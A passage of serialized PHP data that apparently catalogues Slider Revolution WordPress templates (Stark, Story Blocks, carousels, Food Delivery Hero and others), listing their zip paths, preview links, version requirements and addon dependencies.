help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:108:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\" zindex=\"2\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:444;a:25:{s:2:\"id\";s:3:\"480\";s:5:\"title\";s:12:\"Stark Footer\";s:5:\"alias\";s:12:\"stark-footer\";s:3:\"zip\";s:22:\"packs/stark-footer.zip\";s:3:\"uid\";s:32:\"e7132dc158e7dcdb4ef5b3a1aa00208a\";s:3:\"img\";s:23:\"stark-footer/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:6:\"6.2.22\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:114:\"offset=\"t:-50px,-30px,-30px,-20px;b:40px,30px,20px,20px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\" zindex=\"3\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:445;a:25:{s:2:\"id\";s:3:\"481\";s:5:\"title\";s:16:\"Stark Newsletter\";s:5:\"alias\";s:16:\"stark-newsletter\";s:3:\"zip\";s:26:\"packs/stark-newsletter.zip\";s:3:\"uid\";s:32:\"bb76ddd68dbe6bda5ece7e4227a51413\";s:3:\"img\";s:27:\"stark-newsletter/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:33:\"usage=\"modal\" modal=\"s:#contact;\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:446;a:22:{s:2:\"id\";s:3:\"482\";s:5:\"title\";s:15:\"Big Summer Sale\";s:5:\"alias\";s:15:\"big-summer-sale\";s:3:\"zip\";s:19:\"big-summer-sale.zip\";s:3:\"uid\";s:32:\"a6779fa7109763209d234f9cf2e766c6\";s:3:\"img\";s:26:\"big-summer-sale/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/big-summer-sale-shop-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">The Big Summer Sale Shop Slider is a beautiful eye catcher for your e-commerce website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:447;a:23:{s:2:\"id\";s:3:\"483\";s:5:\"title\";s:18:\"Traveller Carousel\";s:5:\"alias\";s:18:\"traveller-carousel\";s:3:\"zip\";s:22:\"traveller-carousel.zip\";s:3:\"uid\";s:32:\"185344ed6236bea2906a79035d1d5702\";s:3:\"img\";s:29:\"traveller-carousel/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/travel-blog-carousel/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:137:\"<span class=\"ttm_content\">A travel blog carousel with interesting parallax and ken burns effects!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:263:\"<span class=\"ttm_content\">Note that the content visible on all slides can be edited on the \"global layers\" slide.<br/>Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:448;a:22:{s:2:\"id\";s:3:\"484\";s:5:\"title\";s:16:\"Project Carousel\";s:5:\"alias\";s:16:\"project-carousel\";s:3:\"zip\";s:20:\"project-carousel.zip\";s:3:\"uid\";s:32:\"49c85ad406da943bdd25f08fd6496748\";s:3:\"img\";s:27:\"project-carousel/slide1.jpg\";s:7:\"preview\";s:51:\"https://revolution.themepunch.com/project-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:137:\"<span class=\"ttm_content\">A project carousel with images and texts that can be customized easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:449;a:22:{s:2:\"id\";s:3:\"485\";s:5:\"title\";s:13:\"News Carousel\";s:5:\"alias\";s:13:\"news-carousel\";s:3:\"zip\";s:17:\"news-carousel.zip\";s:3:\"uid\";s:32:\"76f5b939150092a30038f161084140ae\";s:3:\"img\";s:24:\"news-carousel/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/news-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:134:\"<span class=\"ttm_content\">A news carousel with images and texts that can be customized easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:450;a:25:{s:2:\"id\";s:3:\"486\";s:5:\"title\";s:29:\"Story Blocks Website Template\";s:5:\"alias\";s:29:\"story-blocks-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:37:\"story-blocks-website-template-package\";s:3:\"img\";s:50:\"packages/story-blocks-website-template-package.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:451;a:25:{s:2:\"id\";s:3:\"487\";s:5:\"title\";s:10:\"Story Menu\";s:5:\"alias\";s:10:\"story-menu\";s:3:\"zip\";s:20:\"packs/story-menu.zip\";s:3:\"uid\";s:32:\"1f2f7cd91480f15cff8e7100f788c650\";s:3:\"img\";s:21:\"story-menu/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:452;a:25:{s:2:\"id\";s:3:\"488\";s:5:\"title\";s:12:\"Story Header\";s:5:\"alias\";s:12:\"story-header\";s:3:\"zip\";s:22:\"packs/story-header.zip\";s:3:\"uid\";s:32:\"e1a5ad5018a24ccdc71c2863edfe775e\";s:3:\"img\";s:23:\"story-header/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:453;a:25:{s:2:\"id\";s:3:\"489\";s:5:\"title\";s:13:\"Story Block 1\";s:5:\"alias\";s:13:\"story-block-1\";s:3:\"zip\";s:23:\"packs/story-block-1.zip\";s:3:\"uid\";s:32:\"2a9fee97dcf477e36d048af8a902f47a\";s:3:\"img\";s:24:\"story-block-1/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:454;a:25:{s:2:\"id\";s:3:\"490\";s:5:\"title\";s:15:\"Story Content 1\";s:5:\"alias\";s:15:\"story-content-1\";s:3:\"zip\";s:25:\"packs/story-content-1.zip\";s:3:\"uid\";s:32:\"6773614bbce543b83a0d2b2ad8facc96\";s:3:\"img\";s:26:\"story-content-1/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:455;a:25:{s:2:\"id\";s:3:\"491\";s:5:\"title\";s:13:\"Story Block 2\";s:5:\"alias\";s:13:\"story-block-2\";s:3:\"zip\";s:23:\"packs/story-block-2.zip\";s:3:\"uid\";s:32:\"2e708e3cebab57ca20b228ffba426ce7\";s:3:\"img\";s:24:\"story-block-2/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:456;a:25:{s:2:\"id\";s:3:\"492\";s:5:\"title\";s:13:\"Story Block 3\";s:5:\"alias\";s:13:\"story-block-3\";s:3:\"zip\";s:23:\"packs/story-block-3.zip\";s:3:\"uid\";s:32:\"7156cf069f65644faf90122dab451231\";s:3:\"img\";s:24:\"story-block-3/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:457;a:25:{s:2:\"id\";s:3:\"493\";s:5:\"title\";s:15:\"Story Content 2\";s:5:\"alias\";s:15:\"story-content-2\";s:3:\"zip\";s:25:\"packs/story-content-2.zip\";s:3:\"uid\";s:32:\"1223cd77d1f36d69e69ce50223e16ea7\";s:3:\"img\";s:26:\"story-content-2/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:458;a:25:{s:2:\"id\";s:3:\"494\";s:5:\"title\";s:13:\"Story Block 4\";s:5:\"alias\";s:13:\"story-block-4\";s:3:\"zip\";s:23:\"packs/story-block-4.zip\";s:3:\"uid\";s:32:\"85ac48e8e8231d2c38206cba4e7ebb68\";s:3:\"img\";s:24:\"story-block-4/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:459;a:25:{s:2:\"id\";s:3:\"495\";s:5:\"title\";s:15:\"Story Content 3\";s:5:\"alias\";s:15:\"story-content-3\";s:3:\"zip\";s:25:\"packs/story-content-3.zip\";s:3:\"uid\";s:32:\"82cac52f3ba79c0559fe0ad0cdf9d3b2\";s:3:\"img\";s:26:\"story-content-3/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:460;a:22:{s:2:\"id\";s:3:\"496\";s:5:\"title\";s:21:\"Animated Mini Website\";s:5:\"alias\";s:12:\"mini-website\";s:3:\"zip\";s:16:\"mini-website.zip\";s:3:\"uid\";s:32:\"cc6c0a3b0f933a88c43e2be0fa397c1c\";s:3:\"img\";s:23:\"mini-website/slide1.jpg\";s:7:\"preview\";s:56:\"https://www.sliderrevolution.com/templates/mini-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:209:\"<span class=\"ttm_content\">The animated mini website template has a modern, vibrant design and can be customized easily! Get the #1 WordPress Builder with 200+ templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:461;a:22:{s:2:\"id\";s:3:\"497\";s:5:\"title\";s:18:\"Food Delivery Hero\";s:5:\"alias\";s:13:\"food-delivery\";s:3:\"zip\";s:17:\"food-delivery.zip\";s:3:\"uid\";s:32:\"992e9b22ff43227a655eea341835d04c\";s:3:\"img\";s:24:\"food-delivery/slide1.jpg\";s:7:\"preview\";s:62:\"https://www.sliderrevolution.com/templates/food-delivery-hero/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:207:\"<span class=\"ttm_content\">Yummy! This hero template convinces with a changing color background, a particle effect, vibrant illustrations and smooth mouse over effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:342:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-mousetrap-addon\\/revslider-mousetrap-addon.php\",\"name\":\"Mousetrap AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:462;a:22:{s:2:\"id\";s:3:\"498\";s:5:\"title\";s:25:\"Slider With Illustrations\";s:5:\"alias\";s:25:\"slider-with-illustrations\";s:3:\"zip\";s:29:\"slider-with-illustrations.zip\";s:3:\"uid\";s:32:\"ebc24280b669f26734c7fdd8b5683e9f\";s:3:\"img\";s:36:\"slider-with-illustrations/slide1.jpg\";s:7:\"preview\";s:69:\"https://www.sliderrevolution.com/templates/slider-with-illustrations/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">A basic slider template with easy to customize content, colorful illustrations and pleasant parallax effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:463;a:25:{s:2:\"id\";s:3:\"499\";s:5:\"title\";s:31:\"Zen Technology Website Template\";s:5:\"alias\";s:31:\"zen-technology-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:39:\"zen-technology-website-template-package\";s:3:\"img\";s:52:\"packages/zen-technology-website-template-package.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for 